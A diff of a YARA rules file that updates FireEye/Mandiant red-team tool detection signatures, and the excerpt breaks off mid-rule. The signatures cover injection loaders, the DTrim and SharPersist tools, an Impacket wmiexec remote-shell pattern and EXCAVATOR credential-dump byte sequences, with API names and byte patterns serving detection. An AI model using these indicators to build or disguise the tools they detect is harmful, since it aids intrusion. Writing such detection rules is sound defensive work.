+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/new/yara/Loader_MSIL_RURALBISHOP_2.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e4efa759d425e2f26fbc29943a30f5bd"
-		logic_hash = "7ef883148926d5786861e5e81b1e645aa2e3ca06bd663f2b5f32e04b5852a218"
+		hash = "e91670423930cbbd3dbf5eac1f1a7cb6"
+		logic_hash = "0467532d643cf0200c6561b0724c884230892bf59db163c311b7d4f8acbb63d6"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$typelibguid1 = "44B83A69-349F-4A3E-8328-A45132A70D62" ascii nocase wide
+		$ss1 = "\x00NtMapViewOfSection\x00"
+		$ss2 = "\x00NtOpenProcess\x00"
+		$ss3 = "\x00NtAlertResumeThread\x00"
+		$ss4 = "\x00LdrGetProcedureAddress\x00"
+		$ss5 = "\x2f(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00i\x00|\x00I\x00n\x00j\x00e\x00c\x00t\x00)\x00$\x00"
+		$ss6 = "\x2d(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00c\x00|\x00C\x00l\x00e\x00a\x00n\x00)\x00$\x00"
+		$tb1 = "\x00SharpSploit.Execution.DynamicInvoke\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_1 : FILE
+rule FIREEYE_RT_APT_Loader_MSIL_TRIMBISHOP_2 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "c2834bd6-efb0-5dac-adcd-a9450090fc28"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "90ee2569-2e68-517b-b2d7-8c4015d92683"
+		date = "2020-12-03"
+		date = "2020-12-03"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPIVOT/production/yara/HackTool_MSIL_SharPivot_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/APT_Loader_MSIL_TRIMBISHOP_2.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e4efa759d425e2f26fbc29943a30f5bd"
-		logic_hash = "1c71b9641e30c9764f3503e49f8f85472d7e62384c8dd2b420c4fa2b2fccda4f"
+		hash = "c0598321d4ad4cf1219cc4f84bad4094"
+		logic_hash = "4cccfca0c06954105f762066741b6c35599a6c28df8b7c255a2659059169578f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$s2 = { 73 ?? 00 00 0A 0A 06 1F ?? 1F ?? 6F ?? 00 00 0A 0B 73 ?? 00 00 0A 0C 16 13 04 2B 5E 23 [8] 06 6F ?? 00 00 0A 5A 23 [8] 58 28 ?? 00 00 0A 28 ?? 00 00 0A 28 ?? 00 00 0A }
-		$s3 = "cmd_rpc" wide
-		$s4 = "costura"
+		$ss1 = "\x00NtMapViewOfSection\x00"
+		$ss2 = "\x00NtOpenProcess\x00"
+		$ss3 = "\x00NtAlertResumeThread\x00"
+		$ss4 = "\x00LdrGetProcedureAddress\x00"
+		$ss5 = "\x2f(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00i\x00|\x00I\x00n\x00j\x00e\x00c\x00t\x00)\x00$\x00"
+		$ss6 = "\x2d(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00c\x00|\x00C\x00l\x00e\x00a\x00n\x00)\x00$\x00"
+		$tb1 = "\x00DTrim.Execution.DynamicInvoke\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Hacktool_PY_Impacketobfuscation_2
+rule FIREEYE_RT_Loader_MSIL_Trimbishop_1 : FILE
 {
 	meta:
-		description = "wmiexec"
+		description = "This rule looks for .NET PE files that have the string 'msg' more than 60 times as well as numerous function names unique to or used by the TrimBishop tool. All strings found in RuralBishop are reversed in TrimBishop and stored in a variable with the format 'msg##'. With the exception of 'msg', 'DTrim', and 'ReverseString' the other strings referenced in this rule may be shared with RuralBishop."
 		author = "FireEye"
-		id = "f1059f66-eaff-5866-bafb-c94236cf96a0"
-		date = "2020-12-01"
-		date = "2020-12-01"
+		id = "4d58f0a2-bf16-584c-8e92-c8ef54427767"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/IMPACKETOBF (Wmiexec)/production/yara/HackTool_PY_ImpacketObfuscation_2.yar#L4-L21"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/Loader_MSIL_TrimBishop_1.yar#L4-L26"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "f3dd8aa567a01098a8a610529d892485"
-		logic_hash = "ccbbe507798f16c7acf0780770fdb81b2e7dc333ab8bc51e6216816276c3f14b"
+		hash = "09bdbad8358b04994e2c04bb26a160ef"
+		logic_hash = "018e87542301db22c384fda2709e8d49711c0fa041d1ef591f98ee7a70dbb677"
 		score = 75
 		quality = 50
-		tags = ""
-		rev = 2
+		tags = "FILE"
+		rev = 3
 
 	strings:
-		$s1 = "import random"
-		$s2 = "class WMIEXEC" nocase
-		$s3 = "class RemoteShell" nocase
-		$s4 = /=[\x09\x20]{0,32}str\(int\(time\.time\(\)\)[\x09\x20]{0,32}-[\x09\x20]{0,32}random\.randint\(\d{1,10}[\x09\x20]{0,32},[\x09\x20]{0,32}\d{1,10}\)\)[\x09\x20]{0,32}\+[\x09\x20]{0,32}str\(uuid\.uuid4\(\)\)\.split\([\x22\x27]\-[\x22\x27]\)\[0\]/
-		$s5 = /self\.__shell[\x09\x20]{0,32}=[\x09\x20]{0,32}[\x22\x27]cmd.exe[\x09\x20]{1,32}\/q[\x09\x20]{1,32}\/K [\x22\x27]/ nocase
+		$msg = "msg" ascii wide
+		$msil = "_CorExeMain" ascii wide
+		$str1 = "RuralBishop" ascii wide
+		$str2 = "KnightKingside" ascii wide
+		$str3 = "ReadShellcode" ascii wide
+		$str4 = "ReverseString" ascii wide
+		$str5 = "DTrim" ascii wide
+		$str6 = "QueensGambit" ascii wide
+		$str7 = "Messages" ascii wide
+		$str8 = "NtQueueApcThread" ascii wide
+		$str9 = "NtAlertResumeThread" ascii wide
+		$str10 = "NtQueryInformationThread" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and #msg > 60 and all of ( $str* )
 }
-rule FIREEYE_RT_Trojan_Win_Generic_101 : FILE
+rule FIREEYE_RT_Loader_MSIL_Ruralbishop_3 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public RuralBishop project."
 		author = "FireEye"
-		id = "0290aaea-d65b-5883-97f9-549d107e3e1f"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "55a060ef-74e2-50d9-9090-558aaa04d97d"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Trojan_Win_Generic_101.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/Loader_MSIL_RuralBishop_3.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "2e67c62bd0307c04af469ee8dcb220f2"
-		logic_hash = "e530183f3cab01560b1abc91e2111e5d9e5aadc1c8134027ac07d8917f9419a0"
+		hash = "09bdbad8358b04994e2c04bb26a160ef"
+		logic_hash = "a4c55dede432c249e36e96ca09555448b0343969d389bfdb4bd459fe34e05ea1"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 3
 
 	strings:
-		$s0 = { 2A [1-16] 17 [1-16] 02 04 00 00 [1-16] FF 15 }
-		$s1 = { 81 7? [1-3] 02 04 00 00 7? [1-3] 83 7? [1-3] 17 7? [1-3] 83 7? [1-3] 2A 7? }
-		$s2 = { FF 15 [4-16] FF D? [1-16] 3D [1-24] 89 [1-8] E8 [4-16] 89 [1-8] F3 A4 [1-24] E8 }
-		$si1 = "PeekMessageA" fullword
-		$si2 = "PostThreadMessageA" fullword
+		$typelibguid1 = "FE4414D9-1D7E-4EEB-B781-D278FE7A5619" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and @s0 [ 1 ] < @s1 [ 1 ] and @s1 [ 1 ] < @s2 [ 1 ] and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_Trojan_Raw_Generic_4 : FILE
+rule FIREEYE_RT_APT_Loader_MSIL_TRIMBISHOP_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "9092f9bb-cab6-55c0-9452-70a6407db93a"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "1a3f4247-25f4-51ca-b881-209c0753b915"
+		date = "2020-12-03"
+		date = "2020-12-03"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Trojan_Raw_Generic_4.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/APT_Loader_MSIL_TRIMBISHOP_1.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "f41074be5b423afb02a74bc74222e35d"
-		logic_hash = "8ffd23631c1a9d1abe6695858ec34d61261b3b3f097be94372f3f34e46e7211e"
+		hash = "e91670423930cbbd3dbf5eac1f1a7cb6"
+		logic_hash = "f020efff58c8b7761d700c662c422a9e1ffdf8fe5f6648e421b7c257e3b8d078"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$s0 = { 83 ?? 02 [1-16] 40 [1-16] F3 A4 [1-16] 40 [1-16] E8 [4-32] FF ( D? | 5? | 1? ) }
-		$s1 = { 0F B? [1-16] 4D 5A [1-32] 3C [16-64] 50 45 [8-32] C3 }
+		$sb1 = { 28 [2] 00 06 0A 06 7B [2] 00 04 [12-64] 06 7B [2] 00 04 6E 28 [2] 00 06 0B 07 7B [2] 00 04 [12-64] 0? 7B [2] 00 04 0? 7B [2] 00 04 0? 7B [2] 00 04 6E 28 [2] 00 06 0? 0? 7B [2] 00 04 [12-80] 0? 7B [2] 00 04 1? 0? 7B [2] 00 04 }
+		$sb2 = { 0F ?? 7C [2] 00 04 28 [2] 00 0A 8C [2] 00 01 [20-80] 28 [2] 00 06 0? 0? 7E [2] 00 0A 28 [2] 00 0A [12-80] 7E [2] 00 0A 13 ?? 0? 7B [2] 00 04 28 [2] 00 0A 0? 28 [2] 00 0A 58 28 [2] 00 0A 13 [1-32] 28 [2] 00 0A [0-32] D0 [2] 00 02 28 [2] 00 0A 28 [2] 00 0A 74 [2] 00 02 }
+		$ss1 = "\x00NtMapViewOfSection\x00"
+		$ss2 = "\x00NtOpenProcess\x00"
+		$ss3 = "\x00NtAlertResumeThread\x00"
+		$ss4 = "\x00LdrGetProcedureAddress\x00"
+		$tb1 = "\x00DTrim.Execution.DynamicInvoke\x00"
 
 	condition:
-		uint16( 0 ) != 0x5A4D and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( @sb1 [ 1 ] < @sb2 [ 1 ] ) and ( all of ( $ss* ) ) and ( all of ( $tb* ) )
 }
-rule FIREEYE_RT_Loader_Win_Generic_17 : FILE
+rule FIREEYE_RT_Hacktool_PY_Impacketobfuscation_2
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "wmiexec"
 		author = "FireEye"
-		id = "4e5bf741-c1e3-54af-9580-02925ba6fc6a"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "f1059f66-eaff-5866-bafb-c94236cf96a0"
+		date = "2020-12-01"
+		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Loader_Win_Generic_17.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/IMPACKETOBF (Wmiexec)/production/yara/HackTool_PY_ImpacketObfuscation_2.yar#L4-L21"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "562ecbba043552d59a0f23f61cea0983"
-		logic_hash = "5c20472c3af0c5b8c825671b12763900d6a711695ed04661b33cbf442422348d"
+		hash = "f3dd8aa567a01098a8a610529d892485"
+		logic_hash = "ccbbe507798f16c7acf0780770fdb81b2e7dc333ab8bc51e6216816276c3f14b"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		rev = 3
+		quality = 50
+		tags = ""
+		rev = 2
 
 	strings:
-		$s0 = { 89 [1-16] FF 15 [4-16] 89 [1-24] E8 [4-16] 89 C6 [4-24] 8D [1-8] 89 [1-4] 89 [1-4] E8 [4-16] 89 [1-8] E8 [4-24] 01 00 00 00 [1-8] 89 [1-8] E8 [4-64] 8A [1-8] 88 }
-		$s1 = { 83 EC [1-16] 04 00 00 00 [1-24] 00 30 00 00 [1-24] FF 15 [4-16] EB [16-64] 20 00 00 00 [0-8] FF 15 [4-32] C7 44 24 ?? 00 00 00 00 [0-8] C7 44 24 ?? 00 00 00 00 [0-16] FF 15 }
-		$si1 = "fread" fullword
-		$si2 = "fwrite" fullword
+		$s1 = "import random"
+		$s2 = "class WMIEXEC" nocase
+		$s3 = "class RemoteShell" nocase
+		$s4 = /=[\x09\x20]{0,32}str\(int\(time\.time\(\)\)[\x09\x20]{0,32}-[\x09\x20]{0,32}random\.randint\(\d{1,10}[\x09\x20]{0,32},[\x09\x20]{0,32}\d{1,10}\)\)[\x09\x20]{0,32}\+[\x09\x20]{0,32}str\(uuid\.uuid4\(\)\)\.split\([\x22\x27]\-[\x22\x27]\)\[0\]/
+		$s5 = /self\.__shell[\x09\x20]{0,32}=[\x09\x20]{0,32}[\x22\x27]cmd.exe[\x09\x20]{1,32}\/q[\x09\x20]{1,32}\/K [\x22\x27]/ nocase
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		all of them
 }
-rule FIREEYE_RT_Loader_Win_Generic_18 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_DTRIM_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'dtrim' project, which is a modified version of SharpSploit."
 		author = "FireEye"
-		id = "6f44bd64-29bd-50e2-8b61-7ba61bb1f688"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "9be695a1-6d18-5952-974c-96a30f035e7a"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Loader_Win_Generic_18.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DTRIM/production/yara/APT_HackTool_MSIL_DTRIM_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "c74ebb6c238bbfaefd5b32d2bf7c7fcc"
-		logic_hash = "28c9497f646fcf3daf7007d7afd37971dd85382062c064173f13049ad419fef1"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "357c1f76631ec9ee342995cd12369fd9ff18c541bffe6f5464b1e8db45057196"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 3
+		rev = 2
 
 	strings:
-		$s0 = { 89 [1-16] FF 15 [4-16] 89 [1-24] E8 [4-16] 89 C6 [4-24] 8D [1-8] 89 [1-4] 89 [1-4] E8 [4-16] 89 [1-8] E8 [4-24] 01 00 00 00 [1-8] 89 [1-8] E8 [4-64] 8A [1-8] 88 }
-		$s2 = { 83 EC [4-24] 00 10 00 00 [4-24] C7 44 24 ?? ?? 00 00 00 [0-8] FF 15 [4-24] 89 [1-4] 89 [1-4] 89 [1-8] FF 15 [4-16] 3? ?? 7? [4-24] 20 00 00 00 [4-24] FF 15 [4-32] F3 A5 }
-		$si1 = "fread" fullword
-		$si2 = "fwrite" fullword
+		$typelibguid0 = "7760248f-9247-4206-be42-a6952aa46da2" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharpersist_1 : FILE
+rule FIREEYE_RT_Loader_MSIL_Inmemorycompilation_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharPersist project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'In-MemoryCompilation' project."
 		author = "FireEye"
-		id = "586e6c91-6970-57d1-8d8c-05ae9eb6117a"
+		id = "80234352-a449-5292-9f0c-beb7a1d39a6c"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPERSIST/production/yara/HackTool_MSIL_SharPersist_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MEMCOMP/production/yara/Loader_MSIL_InMemoryCompilation_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "98ecf58d48a3eae43899b45cec0fc6b7"
-		logic_hash = "cf480026c31b522850e25ba2d7986773d9c664242a2667ecd33151621c98c91e"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "a964a186eb02a2792db01727a31ddaa2414fe9df83cda9b1c9db15d94603303a"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$typelibguid1 = "9D1B853E-58F1-4BA5-AEFC-5C221CA30E48" ascii nocase wide
+		$typelibguid0 = "524d2687-0042-4f93-b695-5579f3865205" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Sharpersist_2 : FILE
+rule FIREEYE_RT_Loader_MSIL_Sharpy_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharPy' project."
 		author = "FireEye"
-		id = "49d7891e-b97a-52a8-acfd-bbf986732d6c"
+		id = "7c7bda22-bacc-5901-a650-a30c9cfcdee7"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPERSIST/production/yara/HackTool_MSIL_SharPersist_2.yar#L4-L23"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPY/production/yara/Loader_MSIL_SharPy_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "98ecf58d48a3eae43899b45cec0fc6b7"
-		logic_hash = "57387352f8fd08e8b859dffc1164d46370f248b337526c265634160010572a00"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "0f73fab3905b4961b8dbeb120d45a34a2383ecdaae0296f38e34f8b7ab4aeee8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$a1 = "SharPersist.lib"
-		$a2 = "SharPersist.exe"
-		$b1 = "ERROR: Invalid hotkey location option given." ascii wide
-		$b2 = "ERROR: Invalid hotkey given." ascii wide
-		$b3 = "ERROR: Keepass configuration file not found." ascii wide
-		$b4 = "ERROR: Keepass configuration file was not found." ascii wide
-		$b5 = "ERROR: That value already exists in:" ascii wide
-		$b6 = "ERROR: Failed to delete hidden registry key." ascii wide
-		$pdb1 = "\\SharPersist\\"
-		$pdb2 = "\\SharPersist.pdb"
+		$typelibguid0 = "f6cf1d3b-3e43-4ecf-bb6d-6731610b4866" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( ( @pdb2 [ 1 ] < @pdb1 [ 1 ] + 50 ) or ( 1 of ( $a* ) and 2 of ( $b* ) ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_Win64_EXCAVATOR_2 : FILE
+rule FIREEYE_RT_Builder_MSIL_Sharpgenerator_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpGenerator' project."
 		author = "FireEye"
-		id = "4b7640e8-5621-5cc3-8ac9-84347f23f5eb"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "ab661cba-f695-59d2-9071-9b9a90233457"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/APT_HackTool_Win64_EXCAVATOR_2.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPGENERATOR/production/yara/Builder_MSIL_SharpGenerator_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4fd62068e591cbd6f413e1c2b8f75442"
-		logic_hash = "14263c17323cd78df10f7f101bd7a9c74f7818b34a2e42125d45205067399381"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "6dc0780e54d33df733aadc8a89077232baa63bf1cbe47c5d164c57ce3185dd71"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$api1 = "PssCaptureSnapshot" fullword
-		$api2 = "MiniDumpWriteDump" fullword
-		$dump = { C7 [2-5] FD 03 00 AC 4C 8D 4D ?? 41 B8 1F 00 10 00 8B [2-5] 48 8B 4D ?? E8 [4] 89 [2-5] 83 [2-5] 00 74 ?? 48 8B 4D ?? FF 15 [4] 33 C0 E9 [4] 41 B8 10 00 00 00 33 D2 48 8D 8D [4] E8 [4] 48 8D 05 [4] 48 89 85 [4] 48 C7 85 [8] 48 C7 44 24 30 00 00 00 00 C7 44 24 28 80 00 00 00 C7 44 24 20 01 00 00 00 45 33 C9 45 33 C0 BA 00 00 00 10 48 8D 0D [4] FF 15 [4] 48 89 85 [4] 48 83 BD [4] FF 75 ?? 48 8B 4D ?? FF 15 [4] 33 C0 EB [0-17] 48 8D [5] 48 89 ?? 24 30 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 41 B9 02 00 00 00 4C 8B 85 [4] 8B [1-5] 48 8B 4D ?? E8 }
-		$enable_dbg_pri = { 4C 8D 45 ?? 48 8D 15 [4] 33 C9 FF 15 [4] 85 C0 0F 84 [4] C7 45 ?? 01 00 00 00 B8 0C 00 00 00 48 6B C0 00 48 8B 4D ?? 48 89 4C 05 ?? B8 0C 00 00 00 48 6B C0 00 C7 44 05 ?? 02 00 00 00 FF 15 [4] 4C 8D 45 ?? BA 20 00 00 00 48 8B C8 FF 15 [4] 85 C0 74 ?? 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 45 33 C9 4C 8D 45 ?? 33 D2 48 8B 4D ?? FF 15 }
+		$typelibguid0 = "3f450977-d796-4016-bb78-c9e91c6a0f08" ascii nocase wide
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_Win64_EXCAVATOR_1 : FILE
+rule FIREEYE_RT_APT_Loader_MSIL_LUALOADER_2 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "e593b589-747d-53c2-a39a-57485e4f7641"
-		date = "2020-11-30"
-		date = "2020-11-30"
-		modified = "2020-12-09"
+		id = "f2826dbb-f0a4-5361-94d1-8509c60c4131"
+		date = "2020-12-18"
+		modified = "2020-12-18"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/APT_HackTool_Win64_EXCAVATOR_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_Loader_MSIL_LUALOADER_2.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "6a9a114928554c26675884eeb40cc01b"
-		logic_hash = "aa06628ddef0f95c4217b97a3476a0ee12e00d04c4827a512730598f3c80f1f6"
+		logic_hash = "700927768669eda6976071306e991bfaae136279f4265980521597c699fbed88"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		rev = 3
 
 	strings:
-		$api1 = "PssCaptureSnapshot" fullword
-		$api2 = "MiniDumpWriteDump" fullword
